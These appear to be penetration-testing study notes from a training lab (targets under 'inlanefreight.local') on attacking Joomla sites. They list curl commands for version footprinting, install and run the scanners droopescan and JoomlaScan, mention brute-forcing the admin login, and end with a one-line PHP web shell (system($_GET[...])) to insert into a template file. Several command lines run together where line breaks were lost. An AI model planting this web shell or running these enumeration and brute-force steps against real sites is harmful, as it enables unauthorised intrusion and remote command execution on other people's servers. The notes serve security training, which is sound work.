Joomla Attacks
get Joomla installs!
curl -s https://developer.joomla.org/stats/cms_version | python3 -m json.toolDiscovery/Footprinting
curl -s http://dev.inlanefreight.local/ | grep Joomlacurl -s http://dev.inlanefreight.local/README.txt | head -n 5curl -s http://dev.inlanefreight.local/administrator/manifests/files/joomla.xml | xmllint --format -The
cache.xmlfile can help to give us the approximate version.
curl -s http://app.inlanefreight.local/plugins/system/cache/cache.xml | xmllint --format -Enumeration
try out droopescan
droopescan
sudo pip3 install droopescandroopescan -hdroopescan scan joomla --url http://dev.inlanefreight.local/JoomlaScan
We can also try out JoomlaScan, which is a Python tool inspired by the now-defunct OWASP joomscan tool.
sudo python2.7 -m pip install urllib3
sudo python2.7 -m pip install certifi
sudo python2.7 -m pip install bs4python2.7 joomlascan.py -u http://dev.inlanefreight.localbrute-forcing
The default administrator account on Joomla installs is
admin,but the password is set at install time
We can use this script to attempt to brute force the login.
Attacking Joomla
add to templated file
system($_GET['dcfdd5e021a869fcc6dfaef8bf31377e']);Last updated